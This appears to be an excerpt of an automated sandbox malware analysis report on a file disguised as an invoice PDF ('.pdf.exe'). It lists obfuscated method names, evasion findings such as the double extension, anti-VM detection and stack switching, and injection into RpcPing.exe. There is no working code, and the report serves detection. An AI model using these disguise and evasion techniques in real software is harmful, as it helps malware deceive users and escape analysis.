Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ARbWimPM9BLNHCRJ2O.cs High entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs High entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, nTJjqGDEwt6UWiOkfg.cs High entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs High entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, OjZ7RBSXW86l78uSxp.cs High entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, Wpam4hihg0Nvl3e5yB.cs High entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, Ai53E95PRabl3WDJEP.cs High entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, T2PoPgILNR5h8eN7LX.cs High entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, zy1dsfGrxZ2s5C8xWF.cs High entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ICVpIsRZpK8Dw3FWN4.cs High entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ABEQf2h3T9yKYESMIE.cs High entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, gKOXD3z7pcJxVh7SOu.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, SWaEDGw2CVMfXXDHb5.cs High entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, j81Na2FAQgp64f4UWH.cs High entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, jFxTeRd4Bb2okMqd4B.cs High entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, x7nXI7OSkcCo7q7eWZ.cs High entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, VJYMC1jXYO50ycofa1x.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, EAgkxljcSmXysaymPIk.cs High entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, aCwl6tvb2r4l4lgPk8.cs High entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ARbWimPM9BLNHCRJ2O.cs High entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs High entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, nTJjqGDEwt6UWiOkfg.cs High entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs High entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, OjZ7RBSXW86l78uSxp.cs High entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, Wpam4hihg0Nvl3e5yB.cs High entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, Ai53E95PRabl3WDJEP.cs High entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, T2PoPgILNR5h8eN7LX.cs High entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, zy1dsfGrxZ2s5C8xWF.cs High entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ICVpIsRZpK8Dw3FWN4.cs High entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ABEQf2h3T9yKYESMIE.cs High entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, gKOXD3z7pcJxVh7SOu.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, SWaEDGw2CVMfXXDHb5.cs High entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, j81Na2FAQgp64f4UWH.cs High entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, jFxTeRd4Bb2okMqd4B.cs High entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, x7nXI7OSkcCo7q7eWZ.cs High entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, VJYMC1jXYO50ycofa1x.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, EAgkxljcSmXysaymPIk.cs High entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, aCwl6tvb2r4l4lgPk8.cs High entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ARbWimPM9BLNHCRJ2O.cs High entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs High entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, nTJjqGDEwt6UWiOkfg.cs High entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs High entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, OjZ7RBSXW86l78uSxp.cs High entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, Wpam4hihg0Nvl3e5yB.cs High entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, Ai53E95PRabl3WDJEP.cs High entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, T2PoPgILNR5h8eN7LX.cs High entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, zy1dsfGrxZ2s5C8xWF.cs High entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ICVpIsRZpK8Dw3FWN4.cs High entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ABEQf2h3T9yKYESMIE.cs High entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, gKOXD3z7pcJxVh7SOu.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, SWaEDGw2CVMfXXDHb5.cs High entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, j81Na2FAQgp64f4UWH.cs High entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, jFxTeRd4Bb2okMqd4B.cs High entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, x7nXI7OSkcCo7q7eWZ.cs High entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'

Hooking and other Techniques for Hiding and Protection
barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: ORIGINAL INVOICE COAU7230734298.pdf.exe PID: 7276, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
